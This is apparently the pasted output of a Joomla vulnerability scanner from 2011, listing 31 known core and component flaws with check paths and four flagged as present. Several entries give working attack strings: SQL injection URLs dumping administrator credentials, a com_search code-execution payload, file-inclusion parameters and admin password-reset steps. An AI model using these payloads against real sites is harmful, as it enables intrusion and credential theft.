Untitled

By: a guest on Jul 9th, 2011  |  syntax: None  |  size: 8.72 KB  |  views: 3,636  |  expires: Never
Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 4
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 5
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 6
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 7
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 8
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 9
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 10
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 11
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 12
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password
Vulnerable? No

# 13
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 14
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 15
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versions Affected: N/A
Check: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No

# 16
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 17
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 18
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 19
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 20
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 21
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 22
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 23
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No

# 24
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 25
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 26
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 28
Info -> Component: JCE XSS+File Inclusion Vulnerability
Versions Affected: 1.0.4<=
Check: /components/com_jce/
Exploit: 1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.  2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.
Vulnerable? No

# 29
Info -> Component: CHRONOContact File Inclusion Vulnerability
Versions effected: N/A
Check: /administrator/components/com_chronocontact/excelwriter/PPS/File.php
Exploit: /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
Vulnerable? No

# 30
Info -> Component: com_knowledgebase addon FCKEditor Abuse of Functionalities Vulnerability
Versions effected: 2.6.1.4 <=
Check: /components/com_knowledgebase/fckeditor/fckeditor.js
Exploit: Certain versions of FCKeditor have multiple security vulnerabilities.
Vulnerable? N/A

# 31
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

There are 4 vulnerable points in 31 found entries!